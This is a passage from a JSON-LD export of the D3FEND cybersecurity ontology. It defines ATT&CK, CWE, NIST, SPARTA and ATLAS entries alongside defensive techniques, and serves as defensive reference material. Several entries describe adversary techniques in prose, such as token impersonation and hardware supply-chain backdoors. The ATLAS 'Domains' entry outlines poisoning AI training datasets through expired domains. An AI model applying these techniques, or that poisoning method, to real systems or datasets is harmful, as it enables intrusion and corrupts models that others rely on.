      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0060"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Publish Hallucinated Entities"
    },
    {
      "@id": "d3f:Reference-NIST-Special-Publication-800-53A-Revision-5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.SP.800-53Ar5"
      },
      "d3f:kb-abstract": "This publication provides a methodology and set of procedures for conducting assessments of security and privacy controls employed within systems and organizations within an effective risk management framework. The assessment procedures, executed at various phases of the system development life cycle, are consistent with the security and privacy controls in NIST Special Publication 800-53, Revision 5. The procedures are customizable and can be easily tailored to provide organizations with the needed flexibility to conduct security and privacy control assessments that support organizational risk management processes and are aligned with the stated risk tolerance of the organization. Information on building effective security and privacy assessment plans is also provided with guidance on analyzing assessment results.",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "NIST Special Publication 800-53A Revision 5 - Assessing Security and Privacy Controls in Information Systems and Organizations",
      "rdfs:label": "Reference - NIST Special Publication 800-53A Revision 5 - Assessing Security and Privacy Controls in Information Systems and Organizations"
    },
    {
      "@id": "d3f:InternetPersona",
      "@type": "owl:Class",
      "d3f:definition": "A social identity that an Internet user establishes in online communities and websites. It may also be an actively constructed presentation of oneself.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Online_identity"
      },
      "rdfs:label": "Internet Persona",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Online_identity"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": [
        "Online Identity",
        "Online Persona",
        "Online Personality"
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-15",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Alternate Audit Logging Capability",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "AU-15"
    },
    {
      "@id": "d3f:T1586.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1586.001",
      "d3f:definition": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.",
      "rdfs:label": "Social Media Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1586"
      }
    },
    {
      "@id": "d3f:CCI-000035_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides the capability for privileged administrators to configure the organization-defined security policy filters to support different security policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000035"
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-002%3AUnusuallyLongCommandLineStrings_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-002/"
      },
      "d3f:kb-abstract": "Often, after a threat actor gains access to a system, they will attempt to run some kind of malware to further infect the victim machine. These malware often have long command line strings, which could be a possible indicator of attack. Here, we use sysmon and Splunk to first find the average command string length and search for command strings that stretch over multiple lines, thus identifying anomalies and possibly malicious commands.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-002: Unusually Long Command Line Strings",
      "rdfs:label": "Reference - CAR-2021-01-002: Unusually Long Command Line Strings - MITRE"
    },
    {
      "@id": "d3f:EmailFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:EmailFiltering"
      ],
      "d3f:d3fend-id": "D3-EF",
      "d3f:definition": "Filtering incoming email traffic based on specific criteria.",
      "d3f:filters": {
        "@id": "d3f:Email"
      },
      "d3f:kb-article": "## How it works\n\nMail filters can be implemented to scan inbound email messages at the initial SMTP connection stage to detect and reject email containing spam and malware.\n\nThis technique is distinct from d3f:EmailDeletion because it prevents an email from reaching a user's inbox. This technique can also be used for outbound email traffic.\n\n## Considerations\n* The effectiveness of mail filters depends on the completeness of the filter policies",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForProvidingAnonymousRemailingAndFilteringOfElectronicMail_Nokia"
      },
      "rdfs:label": "Email Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "_:N4cb683565bfd432abfd27da7ff6828da"
        }
      ]
    },
    {
      "@id": "_:N4cb683565bfd432abfd27da7ff6828da",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:PhysicalKey",
      "@type": "owl:Class",
      "d3f:definition": "A physical key is an object, typically metal, used to operate a lock. It is designed with specific markers that match the internal mechanism of the lock, allowing it to rotate the lock when inserted.",
      "rdfs:label": "Physical Key",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalArtifact"
        },
        {
          "@id": "_:Ndf8b96463a47478e8a8ffe7c9a41e2da"
        }
      ]
    },
    {
      "@id": "_:Ndf8b96463a47478e8a8ffe7c9a41e2da",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:operates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalKeyLock"
      }
    },
    {
      "@id": "d3f:SystemConfigurationDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database used to hold system configuration data.",
      "rdfs:label": "System Configuration Database",
      "rdfs:subClassOf": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:CWE-1251",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1251",
      "d3f:definition": "The product's architecture mirrors regions without ensuring that their contents always stay in sync.",
      "rdfs:label": "Mirrored Regions with Different Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1250"
      }
    },
    {
      "@id": "d3f:T1056.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1056.004",
      "d3f:definition": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:",
      "d3f:may-modify": {
        "@id": "d3f:ProcessCodeSegment"
      },
      "rdfs:label": "Credential API Hooking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1056"
        },
        {
          "@id": "_:N6a09d546f3424b4788039a7808370bce"
        }
      ]
    },
    {
      "@id": "_:N6a09d546f3424b4788039a7808370bce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "d3f:T1134.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1134.001",
      "d3f:copies": {
        "@id": "d3f:AccessToken"
      },
      "d3f:definition": "Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.",
      "rdfs:label": "Token Impersonation/Theft",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1134"
        },
        {
          "@id": "_:N7ef4f926714a440abb643c79abb7d8ab"
        }
      ]
    },
    {
      "@id": "_:N7ef4f926714a440abb643c79abb7d8ab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:PolicyReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Policy",
      "rdfs:label": "Policy Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-8_18",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Security and Privacy Engineering Principles | Trusted Communications Channels",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:EncryptedTunnels"
      },
      "rdfs:label": "SA-8(18)"
    },
    {
      "@id": "d3f:M1026",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:DomainAccountMonitoring"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:StrongPasswordPolicy"
        }
      ],
      "rdfs:label": "Privileged Account Management"
    },
    {
      "@id": "d3f:CWE-593",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-593",
      "d3f:definition": "The product modifies the SSL context after connection creation has begun.",
      "rdfs:label": "Authentication Bypass: OpenSSL CTX Object Modified after SSL Objects are Created",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-666"
        }
      ]
    },
    {
      "@id": "d3f:T1195.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1195.003",
      "d3f:definition": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.",
      "d3f:modifies": {
        "@id": "d3f:HardwareDevice"
      },
      "rdfs:label": "Compromise Hardware Supply Chain",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1195"
        },
        {
          "@id": "_:Nfe1fa4ef6e154a7c96128e64d6e7a929"
        }
      ]
    },
    {
      "@id": "_:Nfe1fa4ef6e154a7c96128e64d6e7a929",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:T0862",
      "@type": "owl:Class",
      "d3f:attack-id": "T0862",
      "d3f:definition": "Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment.",
      "rdfs:label": "Supply Chain Compromise - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Supply Chain Compromise"
    },
    {
      "@id": "d3f:RestoreAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreAccess"
      ],
      "d3f:d3fend-id": "D3-RA",
      "d3f:definition": "Restoring an entity's access to resources.",
      "d3f:enables": {
        "@id": "d3f:Restore"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "rdfs:label": "Restore Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Nb0d2c1b4de3145c9959e8f36c160f8be"
        }
      ]
    },
    {
      "@id": "_:Nb0d2c1b4de3145c9959e8f36c160f8be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Restore"
      }
    },
    {
      "@id": "d3f:T1222.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1222.001",
      "d3f:definition": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).",
      "rdfs:label": "Windows File and Directory Permissions Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:T1222"
      }
    },
    {
      "@id": "d3f:AML.T0008.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008.002",
      "d3f:definition": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries may use acquired domains for a variety of purposes (see [ATT&CK](https://attack.mitre.org/techniques/T1583/001/)). Large AI datasets are often distributed as a list of URLs to individual datapoints. Adversaries may acquire expired domains that are included in these datasets and replace individual datapoints with poisoned examples ([Publish Poisoned Datasets](/techniques/AML.T0019)).",
      "rdfs:label": "Domains - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0008"
      },
      "skos:prefLabel": "Domains"
    },
    {
      "@id": "d3f:EndpointHealthBeacon",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:EndpointHealthBeacon"
      ],
      "d3f:d3fend-id": "D3-EHB",
      "d3f:definition": "Monitoring the security status of an endpoint by sending periodic messages with health status, where absence of a response may indicate that the endpoint has been compromised.",
      "d3f:kb-article": "## How it works\nEndpoints are configured to periodically generate and transmit a secure heartbeat that is delivered on a configured schedule and provides endpoint status information. Status information can include software details (version, configuration, etc), endpoint identification (MAC, IP address, machine ID) or other hardware/software configuration information. Interruption of the heartbeat can signal that the endpoint has been compromised.\n\n## Considerations\n* Security of heartbeat messages to ensure message integrity\n* Disappearance of the heartbeat could simply mean that the endpoint is powered off or intentionally disconnected from the network. Therefore other criteria may need to be used to accurately detect endpoint compromise.\n* Attacker presence on the machine may leave the heartbeat intact.\n* An attacker may determine the format of the heartbeat and continue to send it even after the machine is compromised.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-IntrusionDetectionUsingAHeartbeat_SophosLtd"
      },
      "d3f:monitors": {
        "@id": "d3f:NetworkNode"
      },
      "d3f:synonym": "Endpoint Health Telemetry",
      "rdfs:label": "Endpoint Health Beacon",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:N63f6b665785249428b9b177b383bb8cb"
        }
      ]
    },
    {
      "@id": "_:N63f6b665785249428b9b177b383bb8cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkNode"
      }
    },
    {
      "@id": "d3f:CCI-000025_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces information flow control using explicit security attributes on information, source, and destination objects as a basis for flow control decisions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000025"
    },
    {
      "@id": "d3f:EXF-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0004",
      "d3f:definition": "Some missions field secondary links, separate frequencies and hardware, for limited, purpose-built functions (e.g., rekeying, emergency commanding, beacons, custodial crosslinks). Adversaries co-opt these channels as covert data paths: embedding content in maintenance messages, beacon fields, or low-rate housekeeping; initiating vendor/service modes that carry file fragments; or switching to contingency profiles that bypass normal routing and monitoring. Because these paths are distinct from the main TT&C and may be sparsely supervised, they provide discreet avenues to move data off the spacecraft or to external relays without altering the primary link’s traffic patterns.",
      "rdfs:label": "Out-of-Band Communications Link - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Out-of-Band Communications Link"
    },
    {
      "@id": "d3f:T1162",
      "@type": "owl:Class",
      "d3f:attack-id": "T1162",
      "d3f:definition": "MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user's <code>~/Library/Preferences/</code> directory in a plist file called <code>com.apple.loginitems.plist</code> (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to ‘Hide’ the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method <code> SMLoginItemSetEnabled </code> can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well  (Citation: Adding Login Items).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.011",
      "rdfs:label": "Login Item",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.011"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:T1437",
      "@type": "owl:Class",
      "d3f:attack-id": "T1437",
      "d3f:definition": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the mobile device, and often the results of those commands, will be embedded within the protocol traffic between the mobile device and server.",
      "rdfs:label": "Application Layer Protocol - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Application Layer Protocol"
    },
    {
      "@id": "d3f:T1658",
      "@type": "owl:Class",
      "d3f:attack-id": "T1658",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to insecure coding practices that can lead to unanticipated behavior. Adversaries may take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.",
      "rdfs:label": "Exploitation for Client Execution - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileExecutionTechnique"
      },
      "skos:prefLabel": "Exploitation for Client Execution"
    },
    {
      "@id": "d3f:CWE-145",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-145",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as section delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Section Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:Model-basedPolicyOptimization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MBPO",
      "d3f:definition": "Model-based policy optimization (MBPO) is a model-based, online, off-policy reinforcement learning algorithm. For more information on the different types of reinforcement learning agents",
      "d3f:kb-article": "## References\nMBPO Agents. MathWorks.  [Link](https://www.mathworks.com/help/reinforcement-learning/ug/mbpo-agents.html).",
      "rdfs:label": "Model-based Policy Optimization",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-basedReinforcementLearning"
      }
    },
    {
      "@id": "d3f:REC-0001.03",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.03",
      "d3f:definition": "Adversaries look for the complete crypto picture: algorithms and modes, key types and lifecycles, authentication schemes, counter or time-tag handling, anti-replay windows, link-layer protections, and any differences between uplink and downlink policy. With algorithm and key details, a threat actor can craft valid telecommands, masquerade as a trusted endpoint, or degrade availability through replay and desynchronization. Sources include interface specifications, ground software logs, test vectors, configuration files, contractor laptops, and payload-specific ICDs that reuse bus-level credentials. Particular risk arises when command links rely on authentication without confidentiality; once an adversary acquires the necessary keys or counters, they can issue legitimate-looking commands outside official channels. Programs should assume that partial disclosures, MAC length, counter reset rules, or key rotation cadence, aid exploitation.",
      "rdfs:label": "Cryptographic Algorithms - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Cryptographic Algorithms"
    },
    {
      "@id": "d3f:MACAddress",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A media access control address (MAC address) is a unique identifier assigned to a network interface controller (NIC) for use as a network address in communications within a network segment.",
      "d3f:identifies": {
        "@id": "d3f:NetworkInterfaceCard"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:MAC_address"
      },
      "rdfs:label": "MAC Address",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "_:N5e9a9925a8ac4faa9b6b28a4ada027ca"
        }
      ]
    },
    {
      "@id": "_:N5e9a9925a8ac4faa9b6b28a4ada027ca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkInterfaceCard"
      }
    },
    {
      "@id": "d3f:Reference-IsolationOfApplicationsWithinAVirtualMachine_Bromium,Inc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9921860B1"
      },
      "d3f:kb-abstract": "Approaches for launching an application within a virtual machine. In response to receiving a request to launch an application, a device instantiates, without human intervention and based on a policy, a virtual machine in which the application is to be launched. The policy determines which resources of a device, such as a mobile device or computer system, are accessible to the virtual machine. The policy may, but need not, determine whether the virtual machine has access to a type of resource which obligates the user of the device to make a monetary payment for the user of the resource.",
      "d3f:kb-author": "Gaurav Banga, Sergei Vorobiev, Deepak Khajuria, Vikram Kapoor, Ian Pratt, Simon Crosby, Adrian Taylor",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Bromium, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Isolation of applications within a virtual machine",
      "rdfs:label": "Reference - Isolation of applications within a virtual machine - Bromium, Inc."
    },
    {
      "@id": "d3f:AML.T0010.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010.000",
      "d3f:definition": "Adversaries may target AI systems by disrupting or manipulating the hardware supply chain. AI models often run on specialized hardware such as GPUs, TPUs, or embedded devices, but may also be optimized to operate on CPUs.",
      "rdfs:label": "Hardware - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0010"
      },
      "skos:prefLabel": "Hardware"
    },
    {
      "@id": "d3f:CWE-498",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-498",
      "d3f:definition": "The code contains a class with sensitive data, but the class is cloneable. The data can then be accessed by cloning the class.",
      "rdfs:label": "Cloneable Class Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:ApplicationEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the enabling of an application, allowing it to be started or accessed when required.",
      "rdfs:label": "Application Enable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N35d44398d07a4d008422c65acbde1d5e"
        }
      ]
    },
    {
      "@id": "_:N35d44398d07a4d008422c65acbde1d5e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationInstallationEvent"
      }
    },
    {
      "@id": "d3f:T1426",
      "@type": "owl:Class",
      "d3f:attack-id": "T1426",
      "d3f:definition": "Adversaries may attempt to get detailed information about a device’s operating system and hardware, including versions, patches, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1426) during automated discovery to shape follow-on behaviors, including whether or not to fully infects the target and/or attempts specific actions.",
      "rdfs:label": "System Information Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "System Information Discovery"
    },
    {
      "@id": "d3f:REC-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001",
      "d3f:definition": "Threat actors seek a coherent picture of the spacecraft and its supporting ecosystem to reduce uncertainty and plan follow-on actions. Useful design information spans avionics architecture, command and data handling, comms and RF chains, power and thermal control, flight dynamics constraints, payload-to-bus interfaces, redundancy schemes, and ground segment dependencies. Artifacts often include ICDs, block diagrams, SBOMs and toolchains, test procedures, AIT travelers, change logs, and “as-built” versus “as-flown” deltas. Adversaries combine open sources (papers, patents, theses, conference slides, procurement documents, FCC/ITU filings, marketing sheets) with gray sources (leaked RFP appendices, vendor manuals, employee resumes, social posts) to infer single points of failure, unsafe modes, or poorly defended pathways between space, ground, and supply chain. The output of this activity is not merely a document set but a working mental model and, often, a lab replica that enables rehearsal, timing studies, and failure-mode exploration.",
      "rdfs:label": "Gather Spacecraft Design Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Spacecraft Design Information"
    },
    {
      "@id": "d3f:FlightSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ]
    },
    {
      "@id": "d3f:CWE-328",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-328",
      "d3f:definition": "The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same hash (birthday attack).",
      "rdfs:label": "Use of Weak Hash",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-326"
        },
        {
          "@id": "d3f:CWE-327"
        }
      ]
    },
    {
      "@id": "d3f:name",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": {
        "@language": "en",
        "@value": "name"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:InterquartileRange",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-IR",
      "d3f:definition": "The interquartile range (IQR) is a measure of statistical dispersion, which is the spread of the data and is defined as the difference between the 75th and 25th percentiles of the data.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Interquartile range. [Link](https://en.wikipedia.org/wiki/Interquartile_range)",
      "d3f:synonym": "IQR",
      "rdfs:label": "Interquartile Range",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:CodecApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:CodecLibrary"
      },
      "d3f:definition": "An application that encodes and decodes digital data.",
      "rdfs:label": "Codec Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserApplication"
        },
        {
          "@id": "_:Nce0f662a36c04f98a4d538f3f1823767"
        }
      ]
    },
    {
      "@id": "_:Nce0f662a36c04f98a4d538f3f1823767",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CodecLibrary"
      }
    },
    {
      "@id": "d3f:T1027.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1027.004",
      "d3f:creates": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)",
      "rdfs:label": "Compile After Delivery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1027"
        },
        {
          "@id": "_:N7549241edea2497e80ecf786bb0749b6"
        }
      ]
    },
    {
      "@id": "_:N7549241edea2497e80ecf786bb0749b6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
